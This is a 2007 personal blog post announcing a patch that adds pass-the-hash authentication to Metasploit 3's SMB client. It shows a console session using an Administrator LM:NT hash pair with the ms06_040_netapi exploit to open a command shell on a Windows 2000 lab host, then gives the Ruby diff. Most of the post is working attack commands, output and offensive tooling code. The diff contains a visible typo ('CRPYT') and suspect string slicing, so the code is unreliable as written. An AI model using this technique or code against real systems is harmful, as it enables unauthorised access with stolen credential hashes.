Superimposing Nothing Nowhere

The internet is littered with wastes of space. This one is no different except that it is my waste of space.

Wednesday, May 09, 2007

Pass The Hash Support for Metasploit

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.

msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)

at 12:12 AM

Labels: , ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)